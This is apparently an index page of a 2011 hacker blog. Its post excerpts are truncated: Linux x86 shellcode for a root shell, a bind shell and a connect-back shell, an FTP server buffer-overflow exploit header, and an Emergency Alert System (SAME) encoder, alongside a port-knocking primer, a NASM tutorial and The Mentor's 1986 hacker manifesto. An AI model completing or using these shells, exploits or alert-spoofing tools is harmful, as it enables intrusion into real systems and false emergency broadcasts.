header image

Port Knocking

Posted August 2, 2011

[==================================================================================================]

-=[ Port Knocking Primer
-=[ Author: storm

-=[ Website: http://anonymous-lulzsec.com


Table of Contents
    I. Introduction
   II. Current Methods of Access Control
       i. Blacklists
      ii. W…

Read more

(linux/x86) setuid(0) & execve("/bin/sh",0,0)

Posted August 2, 2011

/*
 * (linux/x86) setuid(0) & execve("/bin/sh",0,0)
 * 28 bytes
 *
 * sToRm
 *
 * I made this, because http://www.milw0rm.com/shellcode/7115 felt the need
 * to express his "superior" 28-byte shellcode in all caps.  I wasn't able
 * to beat his code, but it's no longer special.
 */

char shellcode…

Read more

(linux/x86) portbind /bin/sh (port 64713)

Posted August 2, 2011

/*
 * (linux/x86) portbind /bin/sh (port 64713)
 * 82 bytes
 * sToRm
 */

char shellcode[] =
                                // <_start>:
"\x6a\x66"                      // push   $0x66
"\x58"                          // pop    %eax…

Read more

Numbers Station Generator

Posted August 2, 2011
  1. #!/usr/bin/perl
  2.  
  3. # Numbers Station Generator
  4. # Coded by sToRm
  5. #
  6. # First arg: group #
  7. # Second arg: text to be encrypted
  8.  
  9. use strict;
  10. use warnings;
  11.  
  12. my $group = $ARGV[0];
  13. my $message = uc($ARGV[1]);
  14.  
  15. # Yeah, anything not (upper-)alpha can just gtfo
  16. $message =~ s/[^A-Z]//g;
  17.  
  18. my %index = ();
  19. my $i = 0;
  20.  
  21. for (

Read more

(linux/x86) connect-back /bin/sh (port 31337)

Posted August 2, 2011

/*
 * (linux/x86) connect-back /bin/sh (port 31337)
 * 73 bytes
 *
 * sToRm
 */

char shellcode[] =
                                // <_start>:
"\x6a\x66"                      // push   $0x66
"\x58"                          // pop    %eax…

Read more

x86 NASM

Posted August 2, 2011

[==================================================================================================]
-
-=[ An Introduction to Programming with x86 NASM
-=[ Author: storm
-
This article is meant to serve as a SIMPLE and INTRODUCTORY guide to writing x86 assembly code on
Linux using the NASM assembler.  Whe…

Read more

FreeFloat FTP Server ACCL Buffer Overflow Exploit

Posted July 24, 2011

#!/usr/bin/python 

#[+]Exploit Title: FreeFloat FTP Server ACCL Buffer Overflow Exploit 

#[+]Date: 19\06\2011 

#[+]Author: mortis 

#[+]Software Link: http://www.freefloat.com/software/freefloatftpserver.zip 

#[+]Version: 1.00 

#[+]Tested On: Windows XP SP3 English 

#[+]CVE: N/A 

Read more

same_enc same_enc.c

Posted July 21, 2011
  1. /* SAME encoder
  2.  * http://www.anonymous-antisec.com
  3.  * Anti - Security
  4.  * Written by anonymouse.gah@gmail.com
  5.  *  www.youtube.com/watch?v=sdmkTkWB40Q - tutorial
  6.  *
  7.  * SAME is the protocol for the Emergency Alert Service as defined in 47 CFR 11
  8.  * to send critical alerts.  Feder…

Read more

Manifesto

The Mentor 1986

Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...

Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the  hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world...

Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...

Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."

Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here...

Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...

Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.